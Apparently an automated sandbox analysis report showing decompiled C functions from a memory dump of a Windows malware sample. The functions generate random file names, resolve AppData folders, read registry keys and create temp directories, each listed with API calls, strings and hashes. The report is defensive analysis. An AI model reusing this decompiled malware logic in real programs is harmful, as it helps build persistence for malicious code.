				_t56 = E0040D4FB();
				_t77 = "bcdfghklmnpqrstvwxz";
				if((_t56 & 0x00000100) == 0) {
					_v32 = "aeiouy";
					_v28 = _t77;
				} else {
					_v32 = _t77;
					_v28 = "aeiouy";
				}
				_t84 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t87 > 0) {
					_v20 = _a4 & 0x00000004;
					do {
						if(_v8 == 2) {
							if((E0040D4FB() & 0x00000100) == 0) {
								_v32 = "aeiouy";
								_v28 = _t77;
							} else {
								_v32 = _t77;
								_v28 = "aeiouy";
							}
							_v8 = _v8 & 0x00000000;
						}
						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
						if(_v20 == 0 || _t84 - _v12 <= 1 || (E0040D4FB() & 0x00000101) != 0x101) {
							_t71 =  *((char*)(E0040D547(_v24 - 1, 0) + _t88));
						} else {
							_t71 = 0x20;
							_v12 = _t84;
						}
						_a8[_t84] = _t71;
						_t84 = _t84 + 1;
						_v8 = _v8 + 1;
					} while (_t84 < _v16);
					_t87 = _v16;
				}
				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
					_t85 = _a8;
				} else {
					_t85 = _a8;
					_t59 = _t85 + _t87 * 2 - 2;
					while( *_t59 == 0x20) {
						_t59 = _t59 - 2;
						_t87 = _t87 - 1;
						if(_t87 != 0) {
							continue;
						} else {
						}
						goto L24;
					}
				}
				L24:
				_t57 = 0;
				_t85[_t87] = 0;
				if((_a4 & 0x00000002) != 0) {
					_t57 = CharUpperW( *_t85 & 0x0000ffff);
					 *_t85 = 0;
				}
				return _t57;
			}

0x00410556
0x00410558
0x0041055b
0x00410560
0x0041056a
0x00410578
0x0041057f
0x0041056c
0x0041056c
0x0041056f
0x0041056f
0x00410582
0x00410584
0x00410587
0x0041058c
0x00410598
0x0041059b
0x0041059f
0x004105ab
0x004105b9
0x004105c0
0x004105ad
0x004105ad
0x004105b0
0x004105b0
0x004105c3
0x004105c3
0x004105ca
0x004105e0
0x004105e3
0x00410614
0x00410601
0x00410603
0x00410604
0x00410604
0x0041061c
0x00410620
0x00410621
0x00410624
0x0041062d
0x0041062d
0x00410634
0x0041064f
0x0041063a
0x0041063a
0x0041063d
0x00410641
0x00410647
0x0041064a
0x0041064b
0x00000000
0x00000000
0x0041064d
0x00000000
0x0041064b
0x00410641
0x00410652
0x00410652
0x00410658
0x0041065c
0x00410662
0x00410668
0x00410668
0x0041066f

APIs

Part of subcall function 0040D4FB: GetTickCount.KERNEL32 ref: 0040D4FB

CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 00410662

Strings

.exe, xrefs: 0041054C
aeiouy, xrefs: 0041056F, 00410578, 004105B0, 004105B9
bcdfghklmnpqrstvwxz, xrefs: 00410560

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CharCountTickUpper
String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
API String ID: 2674899715-3410450461
Opcode ID: 520400651df368d3e5a572de1fd8fab3b317441505123ece1166f3a8820f7981
Instruction ID: 70c39ba6cf171069a6263e6643defc9655b360b2b806ad9082fd34d7e2821c11
Opcode Fuzzy Hash: 520400651df368d3e5a572de1fd8fab3b317441505123ece1166f3a8820f7981
Instruction Fuzzy Hash: 4A318FB1D00219ABCB10DF99C5456EEBBB5EF84308F50806BD851AB281D3B8DED1CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 004188A1, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004188A1(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v76;
				char _v116;
				char _v636;
				short _v1156;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E0040C275( &_v12,  &_v12, 0, 8);
				_t28 = 0x60;
				E004128DB(_t28,  &_v116);
				_t30 = 0x61;
				E004128DB(_t30,  &_v52);
				_t55 =  &_v636;
				_t35 = E004102E6(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
						E00418659(_t65,  &_v1156,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E0040C1C2(_v12);
					}
					_push(0xcb);
					return E00417504(_t54, _v12, 0x63);
				} else {
					_t60 =  &_v76;
					_t39 = 0x62;
					E004128DB(_t39, _t60);
					_v28 = 0x23;
					_v24 = 0x1a;
					_v20 = 0x26;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v636;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E004118EB( &_v636,  &_v16, _t68, 1, 2, E004186B3,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x004188a1
0x004188a1
0x004188b6
0x004188c0
0x004188c1
0x004188cb
0x004188cc
0x004188df
0x004188ea
0x004188f2
0x004188f4
0x004188f6
0x00418903
0x00418914
0x00418914
0x004188f6
0x0041891c
0x00418984
0x00418984
0x00000000
0x0041899b
0x00418989
0x00000000
0x0041891e
0x00418920
0x00418923
0x00418924
0x0041892b
0x00418932
0x00418939
0x00418940
0x00418943
0x00418945
0x00418945
0x00418953
0x00418959
0x0041895b
0x0041896d
0x00418976
0x00418976
0x0041897b
0x0041897c
0x00418981
0x00000000
0x00418981

APIs

Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00418903
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00418953

Strings

#, xrefs: 0041892B
&, xrefs: 00418939

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: dd589366d4a22c1d1b435649e84aa9f9cd5bddca97d4c06dc4976b07a5e37fbf
Instruction ID: ac8f521ba52bef1e60359586b78410cc296b3e4c34e499de3016cc90cc8362ea
Opcode Fuzzy Hash: dd589366d4a22c1d1b435649e84aa9f9cd5bddca97d4c06dc4976b07a5e37fbf
Instruction Fuzzy Hash: 513161B2D0021CBADF10ABA1DC89FEE777CEB04318F10496BF601F7191DA785A858B95

Uniqueness

Uniqueness Score: -1.00%

Function 00419151, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00419151(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char _v68;
				char _v120;
				char _v644;
				short _v1164;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E0040C275( &_v12,  &_v12, 0, 8);
				_t28 = 0x77;
				E004128DB(_t28,  &_v120);
				_t30 = 0x78;
				E004128DB(_t30,  &_v44);
				_t55 =  &_v644;
				_t35 = E004102E6(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
						E00418EF4(_t65,  &_v1164,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E0040C1C2(_v12);
					}
					_push(0xcb);
					return E00417504(_t54, _v12, 0x7a);
				} else {
					_t60 =  &_v68;
					_t39 = 0x79;
					E004128DB(_t39, _t60);
					_v28 = 0x1a;
					_v24 = 0x26;
					_v20 = 0x23;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v644;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E004118EB( &_v644,  &_v16, _t68, 1, 2, E00418F2C,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x00419151
0x00419151
0x00419166
0x00419170
0x00419171
0x0041917b
0x0041917c
0x0041918f
0x0041919a
0x004191a2
0x004191a4
0x004191a6
0x004191b3
0x004191c4
0x004191c4
0x004191a6
0x004191cc
0x00419234
0x00419234
0x00000000
0x0041924b
0x00419239
0x00000000
0x004191ce
0x004191d0
0x004191d3
0x004191d4
0x004191db
0x004191e2
0x004191e9
0x004191f0
0x004191f3
0x004191f5
0x004191f5
0x00419203
0x00419209
0x0041920b
0x0041921d
0x00419226
0x00419226
0x0041922b
0x0041922c
0x00419231
0x00000000
0x00419231

APIs

Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 004191B3
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00419203

Strings

#, xrefs: 004191E9
&, xrefs: 004191E2

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: e2d6fae7bfa2462f7cf2489f033b08787f013d4ebafe9ec3cb0b67d498f2f6fc
Instruction ID: 0a346ad2d6c3d13acfe76843b96ae85bb264e43f969464dbd46b1843a5f0c36d
Opcode Fuzzy Hash: e2d6fae7bfa2462f7cf2489f033b08787f013d4ebafe9ec3cb0b67d498f2f6fc
Instruction Fuzzy Hash: 86314FB2D0021CBADF10ABE19C99EDE777CEB04314F10496AF605F7181D6789EC98BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041349C, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041349C(void* __ecx, WCHAR* __edi, char _a4) {
				char _v108;
				char _v158;
				char _v178;
				char _v198;
				char _v596;
				void* __esi;
				signed int _t12;
				int _t14;
				WCHAR* _t16;
				char* _t18;
				WCHAR* _t19;

				_t19 = __edi;
				 *__edi = 0;
				E00413447(__ecx,  &_v596);
				_t2 =  &_a4; // 0x412c69
				_t12 =  *_t2;
				if(_t12 == 0) {
					L6:
					_t18 =  &_v178;
					goto L7;
				} else {
					_t12 = _t12 - 1;
					if(_t12 == 0) {
						_t18 =  &_v198;
						L7:
						_t16 = 0x423900;
						goto L8;
					} else {
						_t12 = _t12 - 1;
						if(_t12 == 0) {
							goto L6;
						} else {
							_t14 = _t12 - 1;
							if(_t14 == 0) {
								_t16 = L"SOFTWARE\\Microsoft";
								_t18 =  &_v158;
								L8:
								_t21 =  &_v108;
								_t14 = E0040C3CD(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
								if(_t14 != 0) {
									_t14 = E00411A47(_t21, _t19, _t16);
									if(_t14 == 0) {
										L12:
										_t14 = 0;
										 *_t19 = 0;
									} else {
										if(_a4 == 0) {
											_t14 = PathRenameExtensionW(_t19, L".dat");
											if(_t14 == 0) {
												goto L12;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t14;
			}

0x0041349c
0x004134a8
0x004134b3
0x004134b8
0x004134bb
0x004134be
0x004134de
0x004134de
0x00000000
0x004134c0
0x004134c0
0x004134c1
0x004134d6
0x004134e4
0x004134e4
0x00000000
0x004134c3
0x004134c3
0x004134c4
0x00000000
0x004134c6
0x004134c6
0x004134c7
0x004134c9
0x004134ce
0x004134e9
0x004134ed
0x004134f3
0x004134fa
0x00413500
0x00413507
0x0041351f
0x0041351f
0x00413521
0x00413509
0x0041350d
0x00413515
0x0041351d
0x00000000
0x00000000
0x0041351d
0x0041350d
0x00413507
0x004134fa
0x004134c7
0x004134c4
0x004134c1
0x00413527

APIs

PathRenameExtensionW.SHLWAPI(?,.dat,?,00423900,00000000,00000032,?,0001FE38,00000000), ref: 00413515

Strings

.dat, xrefs: 0041350F
SOFTWARE\Microsoft, xrefs: 004134C9
i,A, xrefs: 004134B8

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: ExtensionPathRename
String ID: .dat$SOFTWARE\Microsoft$i,A
API String ID: 3337224433-28984985
Opcode ID: 75d8868982719ba5872afc4e607f13765cf529c70fb03e8558f5c06fc8fd7ae9
Instruction ID: fec5c0bb27381fb112d7997189bb8eccaed89a606435f0d6f523627f76622cdf
Opcode Fuzzy Hash: 75d8868982719ba5872afc4e607f13765cf529c70fb03e8558f5c06fc8fd7ae9
Instruction Fuzzy Hash: ED018C70210209AADB21DF65CC81BEABBA8AF1078AF400127E904E26D1D73CDFC5C65E

Uniqueness

Uniqueness Score: -1.00%

Function 00416B62, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416B62(void* __edx) {
				void _v108;
				char _v120;
				char _v212;
				long _v216;
				char _v224;
				void* __esi;
				void* _t8;
				void* _t16;

				_t16 = __edx;
				_t8 = GetThreadDesktop(GetCurrentThreadId());
				if(_t8 != 0) {
					_t8 = GetUserObjectInformationW(_t8, 2,  &_v108, 0x64,  &_v216);
					if(_t8 != 0 && _v216 == 0x4e) {
						E00413140(0x2937498d,  &_v212, 0);
						_t8 = E0040C233( &_v224,  &_v120, 0x4c);
						if(_t8 == 0) {
							_t8 = E00416770( &_v120, _t16, 0x423e80, _t8);
							if(_t8 == 0) {
								_t8 = E004169DB(0x423e80, 0);
							} else {
								 *0x4238a0 =  *0x4238a0 | 0x00000004;
							}
						}
					}
				}
				return _t8;
			}

0x00416b62
0x00416b76
0x00416b7e
0x00416b8f
0x00416b97
0x00416bac
0x00416bbb
0x00416bc2
0x00416bca
0x00416bd1
0x00416be0
0x00416bd3
0x00416bd3
0x00416bd3
0x00416bd1
0x00416bc2
0x00416b97
0x00416be9

APIs

GetCurrentThreadId.KERNEL32 ref: 00416B6F
GetThreadDesktop.USER32(00000000), ref: 00416B76
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 00416B8F

Part of subcall function 00416770: TlsAlloc.KERNEL32(00423E80,00000000,0000018C,00000000,00000000), ref: 00416789

Strings

N, xrefs: 00416B99

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$AllocCurrentDesktopInformationObjectUser
String ID: N
API String ID: 454308152-1130791706
Opcode ID: b132268847051ef78de5c02699ec163819f7cc4247e6cd3863d6190bcd76a16f
Instruction ID: 952d7750dbf1165f1e04135e1955473ffa7228bf1100b92dbd6dd053766a642d
Opcode Fuzzy Hash: b132268847051ef78de5c02699ec163819f7cc4247e6cd3863d6190bcd76a16f
Instruction Fuzzy Hash: 6D01D4716083106BE610AB619D0AFE773AC5B00B18F41012FFA14DA1D0FB7DF944C69E

Uniqueness

Uniqueness Score: -1.00%

Function 0040883B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040883B(WCHAR* __ebx, void* __ecx, char _a4) {
				void* __edi;
				long _t3;
				WCHAR* _t13;

				_t13 = __ebx;
				if( *0x422468 == 0) {
					E0041349C(__ecx, 0x422468, 2);
					 *((short*)(E0040C1FE(0x422670, 0x422468, E0040CD11(0x422468) + _t10) + 0x422670)) = 0;
					_t3 = PathRemoveFileSpecW(0x422670);
				}
				if(_t13 != 0) {
					E0040C563(_t3 | 0xffffffff, 0x422468, _t13);
					_t3 = PathRenameExtensionW(_t13, L".tmp");
				}
				if(_a4 != 0 &&  *0x423b0c > 1) {
					E004117C9(0x422670);
					E0040F843(0x422670);
					_t3 = GetFileAttributesW(0x422468);
					if(_t3 != 0xffffffff) {
						return E0040F843(0x422468);
					}
				}
				return _t3;
			}

0x0040883b
0x0040884f
0x00408853
0x0040886c
0x00408873
0x00408873
0x0040887b
0x00408884
0x0040888f
0x0040888f
0x0040889a
0x004088a6
0x004088ac
0x004088b2
0x004088bb
0x00000000
0x004088be
0x004088bb
0x004088c5

APIs

PathRemoveFileSpecW.SHLWAPI(00422670,00422670,00422468,00000000,00000002,00000000,00020000,00409335,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722), ref: 00408873
PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,00409335,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?,?), ref: 0040888F
GetFileAttributesW.KERNEL32(00422468,00422670,00422670,00000000,00020000,00409335,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 004088B2

Part of subcall function 0041349C: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423900,00000000,00000032,?,0001FE38,00000000), ref: 00413515

Strings

.tmp, xrefs: 00408889

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Path$ExtensionFileRename$AttributesRemoveSpec
String ID: .tmp
API String ID: 3627892477-2986845003
Opcode ID: c074acea76838a3a525f989513e2a088a139ebab107649fab008df2878df7b3a
Instruction ID: 95485e6875358eb0062060ff729ba8969c7bf419bc17ea6f73b46d46e03f4739
Opcode Fuzzy Hash: c074acea76838a3a525f989513e2a088a139ebab107649fab008df2878df7b3a
Instruction Fuzzy Hash: 68F0622260021075E6213736AD89E7F2A598F91724F94827FF051B52E2DFBC8A4A876D

Uniqueness

Uniqueness Score: -1.00%

Function 004115C7, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004115C7(WCHAR* _a4) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t11;
				void* _t19;
				void* _t20;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t19 = 0;
				while(1) {
					_push(E0040D4FB());
					_push(L"tmp");
					_t18 =  &_v1044;
					_t11 = E0040CEB5(_t10, 0x104,  &_v1044, L"%s%08x");
					_t20 = _t20 + 0xc;
					if(_t11 == 0xffffffff) {
						goto L6;
					}
					if(E00411A47(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
						_t19 = _t19 + 1;
						if(_t19 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x004115ea
0x00411640
0x00000000
0x00411640
0x004115ec
0x004115ee
0x004115f3
0x004115f4
0x00411603
0x00411609
0x0041160e
0x00411614
0x00000000
0x00000000
0x00411629
0x0041163a
0x0041163e
0x00000000
0x00000000
0x00000000
0x00411648
0x00000000
0x00411648
0x00411629
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 004115DE

Part of subcall function 0040D4FB: GetTickCount.KERNEL32 ref: 0040D4FB

Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00411630

Strings

tmp, xrefs: 004115F4
%s%08x, xrefs: 004115F9

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Path$CombineCountCreateDirectoryTempTick
String ID: %s%08x$tmp
API String ID: 1218007593-1196434543
Opcode ID: 20cbc349d140c808b721c45260f45de7f64a024c1d63df15a197477efceb4433
Instruction ID: a4ef2f51171834a63693a6aa5141bdaa3b6551edf68564199ef24a3d261b07ae
Opcode Fuzzy Hash: 20cbc349d140c808b721c45260f45de7f64a024c1d63df15a197477efceb4433
Instruction Fuzzy Hash: 6FF044B16002242BDB206B60CC46BEB3B2CCB01354F144133BF21F65F0D27A9ECA969C

Uniqueness

Uniqueness Score: -1.00%

Function 004117C9, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004117C9(WCHAR* _a4) {
				signed int _t4;
				short _t9;
				signed short _t10;
				WCHAR* _t11;
				WCHAR* _t12;
				int _t18;

				_t12 = _a4;
				_t9 = 0;
				_t11 = PathSkipRootW(_t12);
				if(_t11 == 0) {
					_t11 = _t12;
				}
				while(1) {
					_t4 =  *_t11 & 0x0000ffff;
					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
						goto L5;
					}
					L11:
					_t11 =  &(_t11[1]);
					continue;
					L5:
					_t10 = _t4;
					 *_t11 = 0;
					if(GetFileAttributesW(_t12) == 0xffffffff) {
						_t18 = CreateDirectoryW(_t12, 0);
					}
					if(_t18 == 0) {
						L13:
						return _t9;
					} else {
						if(_t10 == 0) {
							_t9 = 1;
							goto L13;
						}
						 *_t11 = _t10;
						goto L11;
					}
				}
			}

0x004117cb
0x004117d2
0x004117da
0x004117de
0x004117e0
0x004117e0
0x004117e2
0x004117e2
0x004117e8
0x00000000
0x00000000
0x00411820
0x00411820
0x00000000
0x004117f4
0x004117f4
0x004117f9
0x00411805
0x00411810
0x00411810
0x00411816
0x0041182a
0x0041182d
0x00411818
0x0041181b
0x00411825
0x00000000
0x00411825
0x0041181d
0x00000000
0x0041181d
0x00411816

APIs

PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,0040BA3E,?,?,?,?,?), ref: 004117D4
GetFileAttributesW.KERNEL32(?,?,00000000,0040BA3E,?,?,?,?,?), ref: 004117FC
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0040BA3E,?,?,?,?,?), ref: 0041180A

Strings

.exe, xrefs: 004117D0

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFilePathRootSkip
String ID: .exe
API String ID: 4231520044-4119554291
Opcode ID: a48f685c1e61191b0a468fc52961c7c22d5ab0c8ccaaeecbe1ad0c1de1d8f300
Instruction ID: 00fe3c16d6adcdb2383f2ee2e04148e8787900f175e2382c235a4672428e7b14
Opcode Fuzzy Hash: a48f685c1e61191b0a468fc52961c7c22d5ab0c8ccaaeecbe1ad0c1de1d8f300
Instruction Fuzzy Hash: AEF046365412005FC6302B2918446E7B3D8AE11BA0B658527FEE1E33B0D7389CC1C2AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9C9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D9C9(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					return _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(0xffffffff,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x0040d9cd
0x0040d9d6
0x0040d9de
0x0040da00
0x0040da08
0x0040d9e0
0x0040d9e6
0x0040d9ee
0x00000000
0x0040d9f0
0x0040d9f6
0x0040d9fa
0x00000000
0x0040d9fc
0x0040d9ff
0x0040d9ff
0x0040d9fa
0x0040d9ee

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00412A32,00000000,00412F59), ref: 0040D9D6
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040D9E6

Strings

kernel32.dll, xrefs: 0040D9D1
IsWow64Process, xrefs: 0040D9E0

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32.dll
API String ID: 1646373207-3024904723
Opcode ID: 72172540c4693b7f3ac9a67153214643230d5682eb3c935ba15c3f89d9394480
Instruction ID: e23be5f8fdf82eea997bd001e4048c851a026c9a21dcc283b22dd534727be0b0
Opcode Fuzzy Hash: 72172540c4693b7f3ac9a67153214643230d5682eb3c935ba15c3f89d9394480
Instruction Fuzzy Hash: FDE04830714245B6DF0087E59D0AB9F37D89B01795F2402B9A011F20D0DA7CDA08992C

Uniqueness

Uniqueness Score: -1.00%

Function 0041C900, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C900(intOrPtr _a4, intOrPtr _a12) {
				void* __esi;
				void* _t6;
				signed int _t7;

				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x42400c);
					_t7 = E0041C2C7(_a4);
					if(_t7 != 0xffffffff) {
						_t7 = SetEvent( *(_t7 * 0x24 +  *0x423e7c + 4));
					}
					LeaveCriticalSection(0x42400c);
					return _t7;
				}
				return _t6;
			}

0x0041c905
0x0041c916
0x0041c920
0x0041c928
0x0041c937
0x0041c937
0x0041c93e
0x00000000
0x0041c945
0x0041c946

APIs

EnterCriticalSection.KERNEL32(0042400C), ref: 0041C916
SetEvent.KERNEL32(?), ref: 0041C937
LeaveCriticalSection.KERNEL32(0042400C), ref: 0041C93E

Strings

3, xrefs: 0041C907

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: 3
API String ID: 3094578987-1842515611
Opcode ID: e226af85c645ab1b693a96d19d21256a522d0146d1a4f8a44a9cf42006f70a81
Instruction ID: 0c9fc7bc4d9dbf22b0bed22b9ae3cda3e2d33042e0969e861264c8bd73819c1d
Opcode Fuzzy Hash: e226af85c645ab1b693a96d19d21256a522d0146d1a4f8a44a9cf42006f70a81
Instruction Fuzzy Hash: DCE09236104100EBC7206B35ED8889FBB64EBD6335701C57FF065A21B1C738C892CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00419920, Relevance: 6.2, APIs: 4, Instructions: 184
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00419920(char* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v68;
				char _v88;
				char _v108;
				char _v132;
				char _v172;
				short _v260;
				short _v780;
				void* __edi;
				void* __esi;
				intOrPtr _t65;
				intOrPtr _t92;
				int _t104;
				void* _t110;
				intOrPtr _t112;
				void* _t115;
				int _t120;
				void* _t125;
				void* _t132;
				void* _t135;
				void* _t136;

				_t119 = __edx;
				_t118 = __ecx;
				_t120 = 0;
				E0040C275( &_v32,  &_v32, 0, 8);
				_t65 = E0040C192(0xc1c);
				_v16 = _t65;
				if(_t65 == 0) {
					L22:
					if(_v28 <= _t120) {
						return E0040C1C2(_v32);
					}
					return E00417504(_t119, _v32, 0xcb);
				} else {
					_v36 = _t65 + 0x3fc;
					_v48 = 0x80000001;
					_v44 = 0x80000002;
					E004128DB(0x8a,  &_v260);
					E004128DB(0x8b,  &_v88);
					E004128DB(0x8c,  &_v132);
					E004128DB(0x8d,  &_v68);
					E004128DB(0x8e,  &_v108);
					_v12 = 0;
					do {
						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
							goto L20;
						}
						_v24 = _t120;
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
							L19:
